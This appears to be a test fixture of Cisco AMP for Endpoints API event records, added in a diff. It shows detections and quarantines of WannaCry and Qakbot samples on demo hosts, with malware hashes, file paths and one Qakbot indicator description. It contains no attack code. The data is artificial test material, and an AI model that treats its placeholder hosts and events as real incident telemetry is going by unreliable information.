+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}}
